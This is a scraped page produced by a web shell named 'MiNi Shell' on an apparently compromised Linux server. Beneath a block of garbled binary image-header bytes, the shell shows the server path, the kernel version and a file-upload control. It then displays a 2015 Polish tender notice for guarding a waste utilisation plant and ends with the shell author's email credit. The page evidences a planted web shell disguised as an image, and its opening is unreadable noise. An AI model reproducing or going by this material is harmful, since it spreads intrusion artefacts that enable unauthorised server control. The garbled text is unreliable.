JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151207/333396-N-2015.html

<p class="kh_header"><b>Starogard Gdański: Świadczenie usług ochrony obiektów, mienia oraz osób przebywających na terenie Zakładu Utylizacji Odpadów Komunalnych Stary Las Spółka z o.o.</b><br>
<b>Numer ogłoszenia: 333396 - 2015; data zamieszczenia: 07.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Utylizacji Odpadów Komunalnych "Stary Las" Sp. z o. o. , Stary Las 9, 83-200 Starogard Gdański, woj. pomorskie, tel. 58 5300799, faks 58 5300799.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług ochrony obiektów, mienia oraz osób przebywających na terenie Zakładu Utylizacji Odpadów Komunalnych Stary Las Spółka z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usługi polegającej na wykonaniu stałej ochrony fizycznej obiektów, mienia oraz osób przebywających na terenie  Zakładu Utylizacji Odpadów Komunalnych Stary Las Spółka z o.o. z siedzibą w Starym Lesie 9, gm. Starogard Gdański.
Zakres usługi ochrony obejmuje czynności ochrony ciągłej, wykonywanej całodobowo  (w tym dni wolne od pracy i święta), terenu Zakładu o powierzchni 25,19 ha, ogrodzonego siatką, z wejściem/wjazdem na teren Zakładu poprzez 3 bramy.
Przez ochronę mienia i osób rozumie się działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu i/lub osobom, a także przeciwdziałające jego utracie, powstawaniu w nim szkody oraz działania niedopuszczające do wstępu osób nieuprawnionych na teren chroniony.  
Wykonawca działający w obrocie jako profesjonalista w zakresie ochrony osób i mienia zobowiązany jest wykonywać niniejsze zamówienie ze szczególną starannością, zachowując najwyższą jakość świadczonych usług i należycie wypełniać obowiązki wynikające z przepisów powszechnie obowiązujących dotyczących ochrony osób i mienia oraz przestrzegać przepisów  BHP i ppoż., a także  przepisów dotyczących ochrony danych osobowych.
Zamawiający oczekuje świadczenia usług ochrony obiektów, mienia oraz osób   przebywających na terenie Zakładu Utylizacji Odpadów Komunalnych Stary Las	   Sp. z o. o.:
w godzinach od 6:00 do 18:00 - wykonywanej przez jednego pracownika ochrony;
w godzinach od 18:00 do 6:00 -  wykonywanej przez trzech pracowników ochrony, w tym nie później niż od godziny 22:00  przez jednego (z wymaganych trzech), który wpisany jest na listę kwalifikowanych pracowników ochrony fizycznej, wyposażonego    w  środki przymusu bezpośredniego (tj. pałka, kajdanki, paralizator o niskiej mocy).
2.Świadczenie usług ochrony obiektów, mienia oraz osób przebywających na terenie Zakładu wykonywane będzie poprzez:
ciągłą obserwację i kontrolę zainstalowanych w pomieszczeniach (posterunkach):  budynku administracyjnego (Posterunek nr 1) oraz budynku wagi (Posterunek nr 2),  systemów telewizji przemysłowej oraz centrali alarmu pożarowego;
Udostępnione pomieszczenia są monitorowane w systemie online wraz z archiwizacją.
okresowe (co 2-3 godziny), nieregularne obchody terenu Zakładu (obiekty wraz z kwaterami, sprzęt, drogi, place itp.) w godzinach od 18:00 do 6:00, przez cały okres  obowiązywania umowy;
Dokonanie obchodu każdorazowo powinno być potwierdzone za pomocą urządzeń kontrolno- monitorujących będących własnością Zamawiającego i zainstalowanych przez Zamawiającego w wyznaczonych punktach kontrolnych na chronionym terenie.
kontroli stanu ogrodzenia z częstotliwością raz na dobę.  
 Pracownik ochrony dokonujący obchodu musi być wyposażony w laskę z ostrym zakończeniem, zabezpieczająca przed upadkiem z uwagi na trasę obchodu, która na niektórych odcinkach w okresie jesienno-zimowym może być śliska.
Wykonanie obchodu należy każdorazowo potwierdzić imiennym wpisem do Książki raportów.
Wykonanie obchodów chronionego terenu będzie realizowane na podstawie Instrukcji ochrony obiektów opracowanego przez Wykonawcę, w porozumieniu z Zamawiającym i zatwierdzonego przez Zamawiającego.
3.  Do zadań Wykonawcy będzie należało:
a)  ochrona obiektów technologicznych, budynków, maszyn, urządzeń oraz infrastruktury technicznej i drogowej znajdujących się na terenie Zakładu wraz z ochroną pracowników spółki Stary Las przebywających na terenie Zakładu oraz 	wypełnianie zadań wynikających z treści niniejszej specyfikacji. Wykonawca w 	swojej ofercie zobowiązuje się do realizacji  sposobu  wykonywania ochrony fizycznej wymaganej przez Zamawiającego w sposób zapewniający należyte zabezpieczenie osób i mienia; 
b) posiadanie w odwodzie co najmniej jednej Grupy Interwencyjnej, która w przypadku 	wezwania przez dyżurujących Pracowników Ochrony dojedzie do Zamawiającego w czasie nieprzekraczającym 15 minut w celu udzielenia wsparcia osobowego Ochrony. 
Załoga Grupy Interwencyjnej, to zespół umundurowanych pracowników ochrony 	fizycznej, składający się z co najmniej dwóch osób, wyposażony w oznakowany samochód patrolowy, niezbędne środki łączności, środki przymusu bezpośredniego (zgodnie z obowiązującymi standardami w tym zakresie).
4. Wymagania odnośnie sposobu wykonania przedmiotu zamówienia: 
a)powierzenie realizacji zamówienia pracownikom ochrony o odpowiednim do realizacji zadania wieku i stanie zdrowia; 
b)wymiana pracownika ochrony na żądanie Zamawiającego; 
5. Czynności w ramach realizacji przedmiotu zamówienia będą wykonywane przez: a) pracowników ochrony całodobowo;
b)  koordynatora , przy czym może to być jeden z pracowników wskazanych w pkt. 1 
c) grupę patrolowo - interwencyjną, o czasie dojazdu nie dłuższym niż 15 minut, w przypadkach jakichkolwiek zagrożeń, spowodowanych wywołanym sygnałem z systemu 	alarmowego, lub na wezwanie pracownika ochrony pełniącego służbę. 
6. Obowiązki pracowników ochrony: 
1)Pracownik dozorujący systemy alarmowe i monitoring zobowiązany jest do: 
a) wykonywania czynności ochrony obiektów i mienia, polegających na ciągłym obserwowaniu terenu i wnętrz obiektów, poprzez system zainstalowanych kamer oraz podejmowaniu właściwych czynności zapobiegających i likwidujących zagrożenia dla działalności Zamawiającego, w tym także jakiekolwiek uszkodzenia mienia; 
b) zawiadamiania Zamawiającego o wystąpieniu sytuacji kryzysowej lub zagrożeniu na chronionym obszarze, celem wezwania patrolu interwencyjnego, stanowiącego doraźne wsparcie; 
c) powiadamiania pracownika patrolu i wyznaczonego pracownika Zamawiającego 	oraz odpowiednie służby, o przypadkach wystąpienia sytuacji kryzysowej i zagrożenia na 	chronionym terenie takich jak: awarie, pożar i inne zdarzenie 	losowe, kradzież z włamaniem, zagrożenie wybuchem, rabunek, i in. wraz z jednoczesnym 	podjęciem działań zabezpieczających mienie Zamawiającego; 
d) współdziałania z pracownikiem patrolującym, w celu ochrony obiektu i mienia, przed próbami włamania, dewastacji, uszkodzenia, kradzieży oraz nadzór nad bezpieczeństwem osób przebywających zarówno w obiekcie jak i na terenie przylegającym;
e) należytego przechowywania powierzonych kluczy do chronionego/chronionych 	obiektów, ich 	wydawania oraz prowadzenia ewidencji kluczy wydawanych 	osobom upoważnionym; 
f) prowadzenia Książki raportów, z uwzględnieniem szczegółowego zapisu przebiegu służby, w tym wszelkich informacji związanych z ewidencją klientów i gości Zakładu 	(datą, godziną, nr telefonu i sprawą jaką dotyczy wizyta)  oraz wpisem poleceń wydawanych przez osoby upoważnione; 
g) zapoznania się z rozmieszczeniem i obsługą głównych wyłączników prądu, instalacji ppoż., zaworów wodnych i innych systemów monitorowania alarmów;
h)pełnej znajomości topografii chronionych obiektów i mienia; 
i) znajomości urządzeń i systemów zabezpieczających obiekt oraz stałego doskonalenie umiejętności ich obsługi;
j)  weryfikacji osób wchodzących do budynku administracyjnego (Posterunek nr 1) wraz z prowadzeniem  rejestru wejść/wyjść;  
k) wykonywania innych, niewymienionych powyżej czynności zleconych przez upoważnionego pracownika Zamawiającego pod warunkiem, że mieszczą się one w zakresie obowiązków stanowiących  świadczoną usługę.
2) pracownik  dokonujący obchodów (patroli) zobowiązany jest do: 
a) wykonywania obchodów chronionego terenu, zgodnie z wytycznymi zawartymi 	w 	Instrukcji ochrony obiektów;
b) zamykania wyznaczonych pomieszczeń;
c) dokonywania w trakcie wykonywanych obchodów sprawdzenia prawidłowego zabezpieczenia drzwi, okien, bram oraz powiadamiania dozorującego i wyznaczonego pracownika Zamawiającego o stwierdzonych nieprawidłowościach 	oraz podjęcia działań zmierzających do zabezpieczenia zagrożonego miejsca;  
3) Koordynator ochrony zobowiązany jest do: 
a) organizowania pracy pracowników ochrony; 				
b) instruowania pracowników ochrony i kontrolowania wykonywanych przez nich 	zadań; 
c) dokonywania interwencji w związku z zaistniałymi zagrożeniami dla bezpieczeństwa jednostki; 
d) przestrzegania ustalonego porządku w Zakładzie, organizowania oraz wykonywania pracy zgodnie z obowiązującymi przepisami, zarządzeniami, instrukcjami oraz innymi aktami normatywnymi, a przede wszystkim: przestrzegania tajemnicy służbowej, 						
rzetelnego  i sumiennego wykonywania pracy, 
przestrzegania obowiązującego czasu pracy, 			
przestrzegania obowiązujących zasad BHP i ochrony ppoż; 
e) informowania uprawnionej osoby Zamawiającego o stanie załatwionych spraw i napotykanych trudnościach; 
f) skierowania uwagi na należytą dbałości o urządzenia, materiały i inne mienie stanowiące własność 	Zamawiającego, zapobiegania niegospodarności, marnotrawstwu, sprzeniewierzeniom i kradzieży mienia, powiadamiania 		o wszystkiego 	rodzaju nadużyciach na szkodę 	Zamawiającego; 
g) wykazywania inicjatywy w działaniu oraz dążenie do maksymalnego i ekonomicznego wykorzystywania sił i środków przy wykonywaniu zadań; 
h) znajomości urządzeń i systemów zabezpieczających obiekt oraz stałego doskonalenie 	umiejętności ich obsługi;
i) systematycznego szkolenia podległych pracowników ochrony w zakresie umiejętności obsługi urządzeń i systemów zabezpieczających;  
j) realizacji innych zadań ochronnych wynikających z doraźnych poleceń wydawanych przez uprawnione osoby. 
7. Pozostałe obowiązki Wykonawcy 
Wykonawca w ramach wykonania przedmiotu zamówienia zobowiązany jest do: 
a) postępowania z należytą starannością, a w szczególności przyjęcia na siebie obowiązków w zakresie  ochrony obiektów, mienia oraz osób przebywających na terenie Zakładu; 
b) opracowania szczegółowej procedury telefonicznego powiadamiania osoby/osób upoważnionych przez Zamawiającego, o sygnałach  lokalnego systemu alarmowego oraz  wydawanych poleceniach i odwoływaniach doraźnej Grupy Interwencyjnej;
c) współdziałania z właściwą terenową jednostką policji i straży pożarnej w zakresie bezpieczeństwa i ochrony; 
d) wyposażenie pracowników ochrony w jednolity, schludny ubiór, identyfikator pracownika ochrony, niezbędne środki przymusu bezpośredniego, skuteczne środki łączności (w tym krótkofalówki kompatybilne z krótkofalówką PMR 446    o zasięgu do 2 km), lornetki, aparat fotograficzny średniej klasy, laskę z ostrym   zakończeniem i inne niezbędne wyposażenie; 
e) opracowania, w porozumieniu z Zamawiającym, projektu Instrukcji ochrony obiektów  dla 	ochranianego terenu, obiektów, mienia w terminie nie później niż  7 dni od podpisania umowy;
f) sprawowania nadzoru realizacji przedmiotu zamówienia oraz bieżącej kontroli wykonywanych obowiązków z zakresu świadczonej usługi; 
g) zachowania w tajemnicy wszelkich informacji, które mają lub mogą mieć wpływ na 	stan bezpieczeństwa Zamawiającego w czasie obowiązywania umowy oraz po 	jej rozwiązaniu; 
h) protokolarnego przejęcia od Zamawiającego kluczy do chronionego/chronionych 	obiektów oraz 	zainstalowanych urządzeń alarmowych i monitorujących, do obsługi i użytkowania 	na czas trwania umowy;  
i) pełnienia służby w oświetlonych pomieszczeniach (Posterunkach);
j) stawiennictwo na Posterunkach ochrony w czasie 15 minut przed rozpoczęciem 	służby (przekazanie zmiany);
k) na żądanie Zamawiającego, przedkładanie zaświadczeń lekarskich potwierdzających możliwość wykonywania pracy na stanowisku pracownika ochrony;
l) umieszczenia swoich tablic informujących o ochronie, za uprzednią zgodą Zmawiającego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że posiada aktualną koncesję wydaną przez ministra właściwego do spraw wewnętrznych na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, wydaną zgodnie z przepisami Ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2014 r.  poz. 1099.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje należycie co najmniej dwie usługi stałej fizycznej ochrony osób i mienia, o wartości każdej z tych usług co najmniej 100 000, zł brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje co najmniej jedną grupą patrolowo - interwencyjną, o czasie dojazdu nie dłuższym niż 15 minut</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że dysponuje co najmniej 6 pracownikami 	ochrony, w tym co najmniej 3 wpisanych  na listę kwalifikowanych pracowników ochrony fizycznej, którzy będą pełnili służbę na chronionym terenie, posiadających co najmniej  roczne doświadczenie w zakresie ochrony</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonawca wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej 	działalności związanej z przedmiotem zamówienia, na sumę ubezpieczenia minimum 600 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - wysokość gwarantowanego miesięcznego odpisu na PFRON - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne zmiany umowy w stosunku do treści oferty mogą dotyczyć: 
1) 	wynagrodzenia wykonawcy,  
2) 	warunków płatności, 
3)	zmiany czynności wykonawcy w stopniu niewykraczającym poza opis przedmiotu zamówienia. 
2. 	Zmiany, o których mowa w ust. 1 mogą być dokonane w przypadku: 
1)  przeszkód uniemożliwiających zastosowanie przyjętych w SIWZ lub ofercie rozwiązań, 
2) wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają   wprowadzenie zmian do umowy, 
3) przedłużających się procedur przetargowych, mających wpływ na terminy umowne, opóźnienie w podpisaniu umowy,  
4) 	ustawowej zmiany stawki podatku od towarów i usług (VAT), 
5) 	wystąpienia innych nieprzewidzianych przeszkód zewnętrznych. 
3. 	Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie pod rygorem nieważności takiej zmiany w formie aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.starylas.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stary Las 9, 83-200 Starogard Gdański.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2015 godzina 10:00, miejsce: Stary Las 9, 83-200 Starogard Gdański, sekretriat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com